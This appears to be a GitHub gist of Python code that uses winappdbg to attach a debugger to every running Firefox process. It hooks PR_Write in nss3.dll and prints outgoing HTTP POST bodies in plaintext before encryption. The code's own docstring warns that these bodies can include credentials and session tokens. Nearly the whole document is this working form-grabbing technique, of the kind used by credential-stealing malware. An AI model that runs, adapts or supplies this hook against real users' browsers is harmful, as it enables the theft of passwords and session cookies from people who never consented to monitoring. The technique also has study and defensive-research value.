@davidlares
Last active February 12, 2026 05:39
API hooking Firefox's nss3.dll (load_dll function)
from winappdbg.event import EventHandler
from winappdbg.process import Process
import zlib
# this class specifies the module and function to intercept
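class FirefoxHookHandler(EventHandler):
    """Debug-event handler that hooks ``PR_Write`` in Firefox's ``nss3.dll``.

    ``load_dll`` installs the hook when the module is loaded; ``callback`` runs
    on each hooked call and prints buffers that begin with ``POST``.

    The callback matches on plaintext (``b"POST"``), so whatever it prints can
    include credentials and session tokens. Treat the output as sensitive and
    keep it out of shared logs.
    """

    def load_dll(self, event):
        """Install the ``PR_Write`` hook when ``nss3.dll`` is loaded.

        Args:
            event: winappdbg event describing the module that was just loaded.
        """
        module = event.get_module()
        if not module.match_name("nss3.dll"):
            return

        address = module.resolve("PR_Write")
        if not address:
            # Export could not be resolved; leave this process unhooked.
            return

        print('[+] Found PR_Write at addr: ' + str(address))
        # paramCount=3 corresponds to the (fd, buf, amount) arguments that
        # callback() receives.
        event.debug.hook_function(event.get_pid(), address, self.callback, paramCount=3)

    def callback(self, event, address, fd, buf, amount):
        """Print the buffer of a hooked ``PR_Write`` call if it starts with ``POST``.

        Args:
            event: winappdbg event for the hooked call.
            address: value winappdbg passes ahead of the function arguments
                (presumably the return address - confirm); unused here.
            fd: first hooked argument; unused here.
            buf: address of the write buffer inside the debugged process.
            amount: number of bytes the caller asked to write from ``buf``.

        Returns:
            ``False`` when ``amount`` is too small to hold the ``POST`` marker,
            otherwise ``None``.
        """
        # Fewer than 4 bytes cannot contain b"POST", and reading 4 bytes would
        # run past the caller's buffer. The original `return false` raised
        # NameError on this path instead of returning.
        # NOTE(review): with paramCount=3 the arguments are presumably raw
        # machine words, so a negative amount may arrive as a large positive
        # value and pass this check - confirm, and consider an upper bound on
        # the read size.
        if amount < 4:
            return False

        process = Process(event.get_pid())
        try:
            header_check = process.read(buf, 4)
            if header_check == b"POST":
                content = process.read(buf, amount)
                # NOTE(review): content was just confirmed to start with
                # b"POST", so this gzip-magic test cannot be true here and the
                # branch below is effectively dead code.
                if content.startswith(b'\x1f\x8b'):
                    try:
                        decompressed = zlib.decompress(content, 16 + zlib.MAX_WBITS)
                        print(decompressed.decode('utf-8', errors='ignore'))
                    except zlib.error:
                        # Narrowed from a bare `except:` so KeyboardInterrupt
                        # and SystemExit are no longer swallowed.
                        print("[!] Unable to decompress gzip body")
                else:
                    try:
                        print(f"--- DATA ({amount} bytes)")
                        print(content.decode('utf-8', errors='ignore'))
                    except Exception:
                        print("[!] Unable to load content of POST body")
        except Exception as e:
            # Any failure while reading the target's memory is reported here
            # and the hooked call simply goes unlogged.
            print(f"[-] Failed to read memory: {e}")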
#!/usr/bin/python
from winappdbg.debug import Debug
from handler import FirefoxHookHandler
if __name__ == '__main__':
    # A single Debug instance drives every attached process and routes its
    # events to FirefoxHookHandler.
    debug = Debug(FirefoxHookHandler())
    try:
        attached = 0
        # NOTE(review): debug.attach() needs debug rights over the target
        # process; a debugger attaching to a browser process is also an event
        # that endpoint monitoring can alert on.
        for (proc, _image) in debug.system.find_processes_by_filename("firefox.exe"):
            pid = proc.get_pid()
            try:
                print("[+] Found Firefox. PID is: " + str(pid))
                debug.attach(pid)
            except Exception as attach_error:
                print(f"[-] Could not attach to {pid}: {attach_error}")
            else:
                # Counted only when attach() returned without raising.
                attached += 1

        if attached == 0:
            print("[-] Not Firefox processes found")
        else:
            # Blocks here, dispatching debug events, until interrupted.
            debug.loop()
    except KeyboardInterrupt:
        print("Stopping")
    finally:
        # Always release the debugger, whether the loop ended or failed.
        debug.stop()
winappdbg @ git+https://github.com/MarioVilas/winappdbg.git@bc52d752b3b281a92b9405dfed51053720352bba